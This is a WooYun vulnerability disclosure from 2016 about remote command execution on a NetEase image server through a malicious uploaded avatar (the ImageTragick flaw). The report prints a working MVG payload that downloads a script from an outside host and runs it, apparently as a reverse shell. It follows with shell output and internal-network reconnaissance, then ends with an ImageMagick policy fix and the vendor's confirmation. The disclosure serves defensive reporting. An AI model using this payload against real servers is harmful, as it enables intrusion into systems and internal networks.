当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205692

漏洞标题:网易某图片服务器命令执行(已入内网)

相关厂商:网易

漏洞作者: jianFen

提交时间:2016-05-06 16:04

修复时间:2016-06-23 16:00

公开时间:2016-06-23 16:00

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-06: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经确认,细节仅向厂商公开
2016-05-19: 细节向核心白帽子及相关领域专家公开
2016-05-29: 细节向普通白帽子公开
2016-06-08: 细节向实习白帽子公开
2016-06-23: 细节向公众公开

简要描述:

老套路

详细说明:

http://bbs.163.com/user
注册后修改个人资料上传图像
上传图片内容

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|wget 115.2***02/back.py -O /tmp/x.py && python /tmp/x.py 1***2 2333")'
pop graphic-context


sh-4.0# uname -a
uname -a
Linux t-datanode-0 2.6.30-1-686 #1 SMP Mon Aug 3 16:18:30 UTC 2009 i686 GNU/Linux
sh-4.0# ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:43:e0:26:f0
inet addr:220.181.29.230 Bcast:220.181.29.255 Mask:255.255.255.0
inet6 addr: fe80::211:43ff:fee0:26f0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2562477857 errors:107 dropped:0 overruns:0 frame:54
TX packets:37642479 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4144008110 (3.8 GiB) TX bytes:4002831724 (3.7 GiB)
eth1 Link encap:Ethernet HWaddr 00:11:43:e0:26:f1
inet addr:192.168.51.230 Bcast:192.168.51.255 Mask:255.255.255.0
inet6 addr: fe80::211:43ff:fee0:26f1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:653650493 errors:221 dropped:0 overruns:0 frame:111
TX packets:464030411 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2474372533 (2.3 GiB) TX bytes:3341586467 (3.1 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1683512 errors:0 dropped:0 overruns:0 frame:0
TX packets:1683512 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:127026347 (121.1 MiB) TX bytes:127026347 (121.1 MiB)

漏洞证明:

sh-4.0# ping 10.100.21.249
ping 10.100.21.249
PING 10.100.21.249 (10.100.21.249) 56(84) bytes of data.
64 bytes from 10.100.21.249: icmp_seq=1 ttl=253 time=0.810 ms
64 bytes from 10.100.21.249: icmp_seq=2 ttl=253 time=0.755 ms
64 bytes from 10.100.21.249: icmp_seq=3 ttl=253 time=0.827 ms
64 bytes from 10.100.21.249: icmp_seq=4 ttl=253 time=0.785 ms
64 bytes from 10.100.21.249: icmp_seq=5 ttl=253 time=0.838 ms

修复方案:

官方在6.9.3-9版本中对漏洞进行了不完全的修复
使用policy file来防御这个漏洞,这个文件默认位置在 /etc/ImageMagick/policy.xml ,我们通过配置如下的xml来禁止解析https等敏感操作:
<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>

版权声明:转载请注明来源 jianFen@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-09 16:00

厂商回复:

漏洞已修复,感谢您对网易的关注!

最新状态:

暂无